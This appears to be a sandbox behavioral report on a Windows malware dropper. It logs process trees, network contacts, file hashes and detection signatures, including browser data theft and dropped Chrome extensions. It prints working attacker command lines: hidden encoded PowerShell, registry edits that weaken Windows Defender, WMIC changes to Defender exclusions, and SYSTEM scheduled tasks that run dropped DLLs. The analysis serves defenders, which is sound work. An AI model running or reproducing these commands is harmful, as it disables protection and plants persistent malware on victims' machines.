schtasks /CREATE /TN "gHoCPxylp" /SC once /ST 20:52:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gHoCPxylp"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gHoCPxylp"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GSDaywQPJdyrKXMOz" /SC once /ST 15:50:49 /RU "SYSTEM" /TR "\"C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe\" Y4 /JtQUdidSZ 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "GSDaywQPJdyrKXMOz"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 260

C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe

C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\LsoNioE.exe Y4 /JtQUdidSZ 525403 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bGTnZQDECKwDuNSWyq"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ijLlchIpU\YzuYQx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "erLaEdTsgGebTau" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "erLaEdTsgGebTau2" /F /xml "C:\Program Files (x86)\ijLlchIpU\YjYGske.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "erLaEdTsgGebTau"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "erLaEdTsgGebTau"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "JUjxRHGCKYRete" /F /xml "C:\Program Files (x86)\RFIumDCEBXXU2\rrZJbul.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "dHStwJHTntsRr2" /F /xml "C:\ProgramData\oBeyQrPqBvPiiLVB\iWLQpod.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FaHXLaniQBMEYVQSg2" /F /xml "C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR\BXRjqtR.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "AHXMxnWaJXPmSiNckSN2" /F /xml "C:\Program Files (x86)\AClHKqYMJaBBC\XqKPGjy.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "hijxFSKlICFAhziPp" /SC once /ST 08:49:05 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\gLbKcqvTyliDAKYm\qJVmCThd\lVytBec.dll\",#1 /gdidcLuU 525403" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "hijxFSKlICFAhziPp"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\gLbKcqvTyliDAKYm\qJVmCThd\lVytBec.dll",#1 /gdidcLuU 525403

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\gLbKcqvTyliDAKYm\qJVmCThd\lVytBec.dll",#1 /gdidcLuU 525403

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 548

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "GSDaywQPJdyrKXMOz"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2276 -s 1540

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "hijxFSKlICFAhziPp"

Network

Country Destination Domain Proto
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 54.210.117.250:443 service-domain.xyz tcp
US 54.210.117.250:443 service-domain.xyz tcp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.16.225:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 api2.check-data.xyz udp
US 34.217.172.173:80 api2.check-data.xyz tcp

Files

\Users\Admin\AppData\Local\Temp\7zSF1E.tmp\Install.exe

MD5 fcbd9184c70b5ed860915cfccb13fa0d
SHA1 d14a7093faa2d201a8ecde506d766cda5f5d3920
SHA256 b49cee2ce140aeec1d685a83d9ca52893a23da49d7c4622b407834b856175952
SHA512 dd96794616542802c9da7d398eff286365766a16ad996edc867400d90e5f18a78574e67872def5e906e2be84fc4bd0f6d2ff6f7bbbc504ba668443d457ce0f15

C:\Users\Admin\AppData\Local\Temp\7zS1249.tmp\Install.exe

MD5 b4ef95e882fde8174e2c403933235f37
SHA1 f12c45141684417134f4f233bfb988653a78ed68
SHA256 538e6f897d7e83021ee8271a1659cc2f0113fdcbd6597d59e36fe8ac7485c091
SHA512 dfd270d9b2ac20a35c049352c2d1c40c99893b64a756c26ec5b7a09ed51786bb010a2d79d00383d34ddb341104c6fd6d59200d395fdfb7f140321823c9d78883

memory/2412-26-0x0000000010000000-0x000000001328F000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 433528fb134274565b436e463fffd0e4
SHA1 9a8315232e0b3f1664c23ebde4efaa9cbf1cd1f8
SHA256 9bc4042e640a6eed21a6da71060bc8b766cc8cfcf8643b69f99bac55192f334d
SHA512 889bffdcde051d51e93a74fccf6559724959f2851339a2133556ffb35a7fce09b018f8d4f52038a119835b8c9f79062e6d397dd7a0b735d936da5d84dd3249aa

memory/2016-39-0x0000000010000000-0x000000001328F000-memory.dmp

memory/1772-47-0x000000001B650000-0x000000001B932000-memory.dmp

memory/1772-48-0x00000000027A0000-0x00000000027A8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 c1fba44ff8efb6cbb227e149c1a1e473
SHA1 94753babae2b4fb3b7c03d1fa855d3c052d79a77
SHA256 366faff7e4bcfb20432baee3390edfccd40a3948afbe18e7e86e30a49d27d5c5
SHA512 071db3766f80e8e93ff7e06aa131cf8cdc9f96f10c2f505e5e39715a6e1553c3dd90380afe86e9a9f5f04421cd2ba56da0a4b8481af99563e8ebd54864eb67e6

memory/888-57-0x000000001B760000-0x000000001BA42000-memory.dmp

memory/888-58-0x0000000002240000-0x0000000002248000-memory.dmp

C:\Windows\Temp\gLbKcqvTyliDAKYm\aZTMZXIn\uWuWZJhWpuxrZztR.wsf

MD5 de5173197955db1f90ccbf028d80b150
SHA1 e020aadde292a2d8cdc537f6641d2d5b4b1bd00f
SHA256 23e96a863cbaee0ef6ad6734f41876505921e523b70cfa7f19f67b04972148bd
SHA512 afa135139804d6a95b20f8a10af5b8a920e6b169a2029212868606506be2a15bd7fbaa4fbb9f29c79f4315117f59303dcfe6c45b890814fec729c549dd6a1352

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 6303c72da0debb812285d0fa29541e11
SHA1 5d9096e707e22c15af37dfc71139b7871cf45a0c
SHA256 fd83557279421dd4a3ba8cad7c19c4389a169ae61eb405d1fcf9ff325c370ef0
SHA512 67e95cf8e86025f5a658f6123425b8cbb2c64761ed550909eaa721ee2e5b1b808d7b5332700025f6eea8372de2b9b0d792d93fa97981c0184089f58cfca1f50d

memory/948-70-0x000000001B600000-0x000000001B8E2000-memory.dmp

memory/2276-79-0x0000000010000000-0x000000001328F000-memory.dmp

memory/2276-90-0x00000000018D0000-0x0000000001955000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

MD5 53249f8f3aef3572cdcd9a66a20befae
SHA1 5fe1c2a91a8c7d6b698b3d56ddf5269f11f4d3d5
SHA256 b4cf1339527f3d9b2ca5678e9a0a173ef53df144478030ff469e34cb5a0b2d6f
SHA512 9a7e5d07339677a610be12c87aaa2fb80c3c0a005cf6b73340177493b9363be1ed04c0c0796668b1d763c57cf88f7a27804b62e0fadc18cc439a6509e712dc95

memory/2276-123-0x0000000001960000-0x00000000019C6000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 cca515d7ac486d44419259cc805ee930
SHA1 b0ffec21a8724f81d26e1c42c94e48a3d50c8bf8
SHA256 8d00fc5d2302e59a4a1b99ae0217e4f1c73f6e09787f0905a7d383eb2232ae33
SHA512 442c721bd48788941606725eb226d29708a9455335aeba4e12569cab9075f590a5ee35c206d3a707bdb71c099e3dd59d1f78fa475258b3b615f97ccb09feaed0

C:\Program Files (x86)\ijLlchIpU\YjYGske.xml

MD5 3fbb889efea85913894c10d0613e92e1
SHA1 f8f2541b624df4d3942ef6afe933b814f328df51
SHA256 553077c2290aa307c262cb198cb1d5db040317db604301aa9f5cbddc70cd68f1
SHA512 6cf0192cac7f2710406b82ecdec487dafd54ae07cc70a4102ad56fa273137be12074553787394fd1dcb94e5a09ec18700b44c26395d6d3a47e4bcd6669048343

C:\Program Files (x86)\RFIumDCEBXXU2\rrZJbul.xml

MD5 ce7f76bdb791148e3ba20e45a09a8a8d
SHA1 3faf257ec5dbb62251eb6b9ddfb8e43254d77fee
SHA256 88379b08ff0a4481e986eb470aa2b70e9ac7e56a9a8dc4f2f9224434ab6f72c8
SHA512 4344b060a9c72035a0a9b57c2c103b0bb8895bef41b393ca63e3dd605648125bef0733d46d6ea2b29e9475f0473a495c5a30a6655ea522ed8a81bc4c69186ff1

C:\ProgramData\oBeyQrPqBvPiiLVB\iWLQpod.xml

MD5 cf3bb38932518e414e59396fc70f0fd5
SHA1 e26d57e7a2ac8b65bd81deeccc378c630b59f200
SHA256 e10c64d63a4dd4bb0ef3c9182d430676128beb70b2890bb62888a20c2904a7d5
SHA512 9728d8a55953b4a4e2a0d918c8e7bd0c042c59ac72fadc05c6c9ce822cc83cdafdad638e00dfb1eceb765d5bc98da54fea0557fb69263a035572cc9dc8a48793

C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR\BXRjqtR.xml

MD5 5fdadd421e2a28da7904e61b484c72ca
SHA1 4c678db2a8ff7e543b1b747350197340404fa13d
SHA256 fe446159dda41c46ae265fdaee30501fd4cc0d3875d8646c896037ad158f0a55
SHA512 7468397d8deefdaf874fc89941d1149ad554c3d20c955edbba994bf4eadfad0f7a9216ec820cac662ab948c4b58914a294f456412efce26f63874763ec393fee

C:\Program Files (x86)\AClHKqYMJaBBC\XqKPGjy.xml

MD5 0a36280f899360e60388c87025386317
SHA1 d7cababf5af6b2d24f8f88df1b46c700527a4570
SHA256 86d2a7c07263b241027f63334d17f46102ed25849468aba1683c06a1d0e4deee
SHA512 cbf6ef6a246007ab4f08071704c68cda8c6b575729ff4f7b006dbeda40dc50031b9e249fb4d49e06a30bc0bf0590421b83832c3b24057ec9fbb5a3ab75b4ccd1

C:\Windows\Temp\gLbKcqvTyliDAKYm\qJVmCThd\lVytBec.dll

MD5 008d6162a1c3bee849545d99cdca4da7
SHA1 198ef7457efe566d6632b8dd69e601a70b62e106
SHA256 c83932d2ded84adb6da7d6b8c9683defa007adb9936a2425ee91b27d2594dc5b
SHA512 6a5ccb8cc635a37ef0925bc23267c40166c6f64674fa64fdee2532ae79d94920661056f1a3aa7d06e4aece5674bba3c17d8e3d67bbd7fa121b56d1e800634907

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 7b825b260c2ec6532cdbbb3abd30d787
SHA1 5d0f71ccf188f2fbe46829de51f1a0a1d900dbc2
SHA256 f4fc42b97764846944d8ec37dfa1ebe3b4d76e3794a18e2874007fef030a05a6
SHA512 302658feae36a4407d7868ae74a16f11b19d7393c010f6d8ae3241cba65782c2484b8a8f41964ebde2536d8995599302287a811db26a0edb09a6d9e50317025a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jts25bp.default-release\prefs.js

MD5 51e188f997e23b5f284c717ad96a002d
SHA1 73d05673c24687139626ee023f1619666c4a3451
SHA256 ce89bde5220e99dcad018a5e18aca1f5b2d9ba6ba188f7632913e3e4bc046b34
SHA512 257da50e1620fa980961a1aa819b8556f55f94499dc099a0c358d6c563a4a7bfe89fbfd5b0776bb897ab1ea25aeda5da701a118db9b7c02ea7e5a91749d56a4b

memory/2276-306-0x0000000002EB0000-0x0000000002F34000-memory.dmp

memory/2276-316-0x0000000003CC0000-0x0000000003D92000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 4eeb8106d28e8f16f9ba126cf8fd145f
SHA1 0c918e75d95d0c5896012a98368b66acdaf9a1a6
SHA256 a7bf1ed87f8666aed925fa1bab557baad500c504077fd71dfcce5fac22aaa07a
SHA512 5bfb4e030de599b423cfa257bfc2fca02e0255d5c439a71a6c69c28bfa97189b00b1435291e35c77f2450da9947c6fc1df4ce4bb6b44db5af2edd8ae5da15f32

memory/900-347-0x0000000001480000-0x000000000470F000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 23:03

Reported

2024-06-13 23:08

Platform

win10-20240404-en

Max time kernel

165s

Max time network

298s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5fce096dac4659f7fe7fec4951e7828f85fdf78f36aadab4cac153aa96ac8b3a.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS757E.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe N/A
N/A N/A C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Users\Admin\AppData\Local\Temp\7zS7724.tmp\Install.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_95776108E5303B05527E9B63C6628F47 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_0E84AD23AC2E74B30DEF739614C7EB94 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\gLbKcqvTyliDAKYm\NEyxkDcDVFDgMzZ\cXYLIQM.exe N/A
